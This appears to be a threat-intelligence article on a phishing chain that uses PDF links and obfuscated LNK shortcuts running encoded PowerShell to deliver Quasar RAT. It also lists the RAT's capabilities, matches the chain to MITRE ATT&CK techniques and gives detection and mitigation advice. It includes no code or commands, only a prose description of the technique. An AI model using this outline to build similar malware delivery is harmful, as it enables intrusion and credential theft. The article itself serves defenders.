Quasar RAT Delivery via Malicious PDF and LNK Files

A recent surge in Phishing campaigns has highlighted a shift toward multi-stage delivery mechanisms designed to bypass traditional email gateways. According to SANS ISC, security researchers have identified a sophisticated infection chain that utilizes a combination of PDF documents and LNK (shortcut) files to deploy the Quasar RAT on target systems. This technique relies on social engineering rather than a specific CVE exploit, making it particularly effective against organizations with permissive attachment policies.

Analysis of Malicious PDF and LNK Infection Chains

The attack begins with a PDF document that contains an embedded URI action. Unlike older PDF-based attacks that attempted to trigger an RCE through vulnerability exploitation in the PDF viewer, this campaign uses the document as a mere container for a malicious link. When the user clicks the link within the PDF, they are directed to download a ZIP archive containing a heavily obfuscated .lnk file.

Upon execution, the .lnk file utilizes a living-off-the-land (LotL) technique, typically invoking PowerShell or the Windows Command Processor to reach out to an external server. This stage is critical for defenders; understanding how to analyze malicious PDF LNK files is essential for identifying the initial download patterns. The PowerShell script executed by the shortcut file is often encoded in Base64 and designed to download the final stage of the malware—the Quasar RAT—from a remote repository.

Quasar RAT C2 Infrastructure and Capabilities

Quasar RAT is an open-source Remote Access Trojan that provides attackers with comprehensive control over a compromised host. Once the malware is executed, it establishes a connection to the C2 server to receive further instructions. The Quasar RAT C2 infrastructure often utilizes dynamic DNS services or compromised legitimate websites to mask its presence.

The capabilities of Quasar RAT include:

• Remote shell access and command execution.
• Keylogging and credential harvesting from web browsers.
• File system manipulation (uploading/downloading files).
• Remote desktop viewing and control.
• Registry editing to ensure persistence.

Because the malware utilizes encrypted communication channels, SIEM and SOC analysts must look for specific network IoC patterns, such as unusual outbound traffic on non-standard ports or connections to known malicious domains. Once persistence is established, the threat actor may attempt Lateral Movement to identify and exfiltrate sensitive data within the corporate network.

Quasar RAT Detection Techniques and Mitigation

Detecting this specific infection chain requires a layered defense strategy. Traditional antivirus often fails to flag the initial PDF lure because it does not contain a malicious payload. Instead, organizations should prioritize EDR solutions that can correlate the PDF reader’s process with the subsequent execution of PowerShell or cmd.exe.

Effective Quasar RAT detection techniques involve monitoring for the following MITRE ATT&CK techniques:

1. T1204.001 (User Execution: Malicious Link): Training users to recognize suspicious URIs inside PDFs.
2. T1204.002 (User Execution: Malicious File): Blocking the execution of LNK files downloaded from the internet.
3. T1059.001 (Command and Scripting Interpreter: PowerShell): Implementing Constrained Language Mode and logging all PowerShell script blocks.

To mitigate this threat, administrators should consider implementing a Zero Trust architecture where no file is implicitly trusted based on its origin. Restricting the ability of standard users to execute scripts or download executable content from the web remains the most effective defense against this evolving malware delivery method.